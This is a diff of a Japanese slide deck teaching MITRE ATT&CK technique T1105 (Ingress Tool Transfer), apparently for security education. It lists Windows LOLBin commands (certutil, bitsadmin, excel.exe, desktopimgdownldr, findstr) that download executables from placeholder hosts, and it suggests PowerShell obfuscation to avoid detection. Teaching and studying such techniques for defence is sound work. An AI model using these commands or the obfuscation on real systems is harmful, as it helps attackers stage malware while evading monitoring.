--- a/T1105.md
+++ b/T1105.md
@@ -4,14 +4,14 @@ theme: gaia
 class: default 
 style: |
     section {
-        font-family: -apple-system, BlinkMacSystemFont, Roboto, "Segoe UI", "Helvetica Neue", HelveticaNeue, YuGothic, "Yu Gothic Medium", "Yu Gothic", Verdana, Meiryo, sans-serif;
+        font-family: "Hiragino Kaku Gothic Pro", "ヒラギノ角ゴ Pro", "Segoe UI", "Yu Gothic Medium", "游ゴシック Medium", YuGothic, "游ゴシック体", "Meiryo UI", sans-serif;
         font-size: 1.8em;
     }
     tr,th,td {
         font-size: 20pt;
     }
     a {
-        font-size: 12pt
+        font-size: 10pt
     }
     h3 {
         text-decoration:none;
@@ -19,8 +19,8 @@ style: |
         padding: 0em;
     }
 ---
-<!-- _footer: May,2021 https://github.com/x270/MITRE -->
 <!-- size:  4:3 -->
+<!-- _footer: May,2021 https://github.com/x270/MITRE -->
 <!-- _class: invert -->
 # MITRE ATT&CK 101
 # T1105 Ingress Tool Transfer
@@ -30,18 +30,16 @@ style: |
 <!-- paginate: true -->
 <!-- page_number: true -->
 ### 超概要
-攻撃用のツールを標的に送り込む。
+ツールを標的に転送する。
 
----
-### 超概要
 5W1h|???
 ---|---
 When | 標的システムへアクセスできた後で
 Who | 攻撃者が
 Why | 目的を達成するため
-How |  あの手この手で
+How |  **あの手この手で**
 Where | 標的システムの外から/中から
-What | 標的システムにツールを持ち込む
+What | 標的システムにツールを転送する
 
 ---
 <!--_footer : https://attack.mitre.org/techniques/T1105/ -->
@@ -55,14 +53,14 @@ scp、rsync、sftpなどのネイティブツールを使用してMacおよびLi
 <!--_footer : https://attack.mitre.org/techniques/T1105/ -->
 ### 分類
 
-| 項目 | 説明 |
-| :--- | :--- |
-| ID | T1105 |
-| サブテクニック | なし |
-| 戦術 | コマンドアンドコントロール |
-| プラットフォーム | Linux、Windows、macOS |
-| 必要な権限 | ユーザー |
-| データソース | ファイル<br>・ファイルの作成<br>ネットワークトラフィック<br>・ネットワーク接続の作成<br>・ネットワークトラフィックコンテンツ<br>・ネットワークトラフィックフロー |
+項目 | 説明
+--- | ---
+ID | T1105
+サブテクニック | なし
+戦術 | コマンドアンドコントロール
+プラットフォーム | Linux、Windows、macOS
+必要な権限 | ユーザー
+データソース | ファイル<br>・ファイルの作成<br>ネットワークトラフィック<br>・ネットワーク接続の作成<br>・ネットワークトラフィックコンテンツ<br>・ネットワークトラフィックフロー
 
 ---
 <!-- _footer : https://attack.mitre.org/ -->
@@ -70,16 +68,17 @@ scp、rsync、sftpなどのネイティブツールを使用してMacおよびLi
 ![height:560](./img/MITRE_T1105.png)
 
 ---
-### ツールを標的に送り込むには
+### ツールを標的に転送するには
 - **Push**
-標的の外からファイルを送り込む
+標的の外からファイルを送り込む。
 
 - **Pull**
-標的の内部操作で、外からファイルを取得する
+標的の内部操作で、外からファイルを取得する。
 
 ---
 <!-- _class: invert -->
 # 基本的な方法
+ファイル転送用のコマンドを使用する
 
 ---
 ### Push - Linux/macOS
@@ -130,18 +129,6 @@ curl -o {local_path} http://{remote_host}/{remote_file}
 
 ---
 ### Pull - Windows
-**certutil**
-```cmd
-cmd /c certutil -urlcache -split -f {remote_file} {local_path}
-```
-**verifyctl**
-```ps1
-$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
-New-Item -Path $datePath -ItemType Directory
-Set-Location $datePath
-certutil -verifyctl -split -f {remote_file}
-Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination {local_path} }
-```
 **DownloadString**
 ```ps1
 PS C:\> (New-Object Net.WebClient).DownloadString('https://example.com/index.html') 
@@ -152,8 +139,8 @@ PS C:\> (New-Object Net.WebClient).DownloadString('https://example.com/index.htm
 <!-- _class: invert -->
 # 少し巧妙な方法①
 
-- 素人目にも何やってるか分かる実行方法は避けたい
-- 難読化により、不正検知を避けられる可能性が上がる。
+- そのままでは監視ソリューションなどで検知される。
+- 難読化を施すことで検知を避けられる可能性が上がる。
 
 ---
 ### Base64によるPowerShell難読化
@@ -225,18 +212,20 @@ powershell.exe (((119, 104, 111, 97, 109, 105) | %{ ([Int]$_ -as [char]) }) -Joi
 <!-- _class: invert -->
 # 少し巧妙な方法②
 
-- scpやsftpでは、素人目にもファイル転送だとバレる。
-- 不正検知されやすいし、実行自体が禁止されてるかも。
-- それっぽくないコマンドを活用して標的内から**Pull**する。
+- ファイル転送用のコマンドは検知されやすく、
+また、実行自体が禁止されていることもある。
+- 一般にファイル転送用とされていないコマンドでも、
+使い方次第で外部からのファイル取得に活用できる。
 
 ---
-### LOLBin / LOLBaS
+### ファイル転送用でないコマンドの活用
 
 scpやsftpなど、分かりやすいコマンドは使いたくないが、  
 侵入時点の標的上には攻撃者の独自ツールは存在しない。  
 
 そこで、
-OSに標準的に存在しているシステムツールを活用する。
+OSに標準的に存在しているコマンド等を活用する。
+このようなコマンドを**LOLBin**、**LOLBaS**等と呼ぶ。
 **LOLBin**：Living Off the Land Binary
 **LOLBaS**：Living Off the Land Binary and Script
 
@@ -254,15 +243,14 @@ excel：Microsoft Excelを起動するコマンド
 excel.exe http://example.com/hoge.dll
 ```
 
-Excel上で読み取り専用でファイルが開くだけに見えるが、  
-ローカルの所定のフォルダにキャッシュとして保存される。
+一見、Excel上で読み取り専用でファイルが開くだけだが、
+ローカルの所定のフォルダにキャッシュが保存される。
 
-キャッシュ先のパスはある程度特定できるため、  
+キャッシュ先のパスは特定できるため、  
 ダウンロード後の実行や他パスへの移動が可能。
 
-ダウンロード後の詳しい手法は下記を参照。
-[Unsanitized file validation leads to Malicious payload download via Office binaries. 
-| by Reegun J | Medium](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)
+詳しい説明は下記を参照。
+[Unsanitized file validation leads to Malicious payload download via Office binaries. | by Reegun J | Medium](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)
 
 ---
 <!-- _footer: https://lolbas-project.github.io/lolbas/Binaries/Findstr/ -->
@@ -271,7 +259,7 @@ Excel上で読み取り専用でファイルが開くだけに見えるが、
 findstr：ファイル内を正規表現で検索するコマンド
 
 ```cmd
-findstr /V /L hogehoge \\servername\\file.exe > c:\work\work.exe
+findstr /V /L hogehoge \\servername\file.exe > c:\work\work.exe
 ```
 **/V**：指定した文字列を**含まない行**をすべて表示
 **/L**：検索文字列をリテラルとして使用する
@@ -288,7 +276,7 @@ findstr /V /L hogehoge \\servername\\file.exe > c:\work\work.exe
 desktopimgdownldr：壁紙をDLして所定のフォルダに置く
 ```cmd
 set "SYSTEMROOT=C:\Windows\Temp" && 
-cmd /c desktopimgdownldr.exe /lockscreenurl:https://example.com/file.ex 
+cmd /c desktopimgdownldr.exe /lockscreenurl:http://example.com/file.exe 
 /eventName:desktopimgdownldr
 ```
 
@@ -312,13 +300,32 @@ bitsadmin /transfer NewJobX http://example.com/x c:\temp\x.exe
 
 
 ---
-<!-- _class: invert -->
-# 余談
+<!-- _footer : https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -->
+### LOLBinの例5 - certutil.exe
+certutil : 証明機関(CA)の構成や管理
+
+**certutil -urlcache**
+```cmd
+cmd /c certutil -urlcache -split -f {remote_file} {local_path}
+```
+**certutil -verifyctl**
+```ps1
+$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
+New-Item -Path $datePath -ItemType Directory
+Set-Location $datePath
+certutil -verifyctl -split -f {remote_file}
+Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination {local_path} }
+```
+
 
 ---
-### 余談
-**T1105**は、MITRE ATT&CK v6.3まで  
-「Remote FileCopy」だった。
+<!-- _class: invert -->
+# -余談-
+# Ingress Tool Transferの前身
+
+---
+### Ingress Tool Transferの前身
+**T1105**は、MITRE ATT&CK v6.3まで「Remote File Copy」。
 
 **Remote File Copy, Technique T1105 - Enterprise | MITRE ATT&CK®**
 https://attack.mitre.org/versions/v6/techniques/T1105/
@@ -326,10 +333,10 @@ https://attack.mitre.org/versions/v6/techniques/T1105/
 ---
 ### 「Remote FileCopy」からの変更点
 
-| Title | TACTIC |
-| :--- | :--- |
-| Remote File Copy | Command And Control, <br>Lateral Movement |
-| Ingress Tool Transfer | Command And Control |
+Title | TACTIC
+--- | ---
+Remote File Copy | Command And Control, <br>Lateral Movement
+Ingress Tool Transfer | Command And Control
 
 ---
 ### 「Remote FileCopy」の定義（前半）
@@ -350,12 +357,13 @@ scp、rsync、sftpなどのネイティブツールを使用してMacおよびLi
 ---
 <!-- _class : invert -->
 ### 参考
-（本文中でリンクを張ったものを除く）
 - [Ingress Tool Transfer, Technique T1105 - Enterprise | MITRE ATT&CK®](https://attack.mitre.org/techniques/T1105/)
 - [MITRE ATT&CK® 頻出手口 トップ10（2020年度下期）: NECセキュリティブログ | NEC](https://jpn.nec.com/cybersecurity/blog/210402/index.html)
 - [ATT&CK with Sub-Techniques — What You Need to Know | by Blake Strom | MITRE ATT&CK® | Medium](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b)
 - [Ingress Tool Transfer - Threat Detection Report - Red Canary](https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/)
 - [MITERATT＆CK®TechniqueT1105：Remote File Copy - Red Canary](https://redcanary.com/threat-detection-report/techniques/remote-file-copy/)
 - [atomic-red-team/T1105.md at master · redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md)
-- [PowerShell難読化の基礎 (3) - Binary Pulsar](https://binary-pulsar.hatenablog.jp/entry/2018/09/14/000000)
+- [PowerShell難読化の基礎 - Binary Pulsar](https://binary-pulsar.hatenablog.jp/entry/2018/09/01/000000)
 - [Living Off The Land Binaries and Scripts (and also Libraries)](https://lolbas-project.github.io/)
+- [Unsanitized file validation leads to Malicious payload download via Office binaries. | by Reegun J | Medium](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)
+- [desktopimgdownldrを使ったLOLBin手法の検証](https://kataware.hatenablog.jp/entry/2020/07/05/132057)
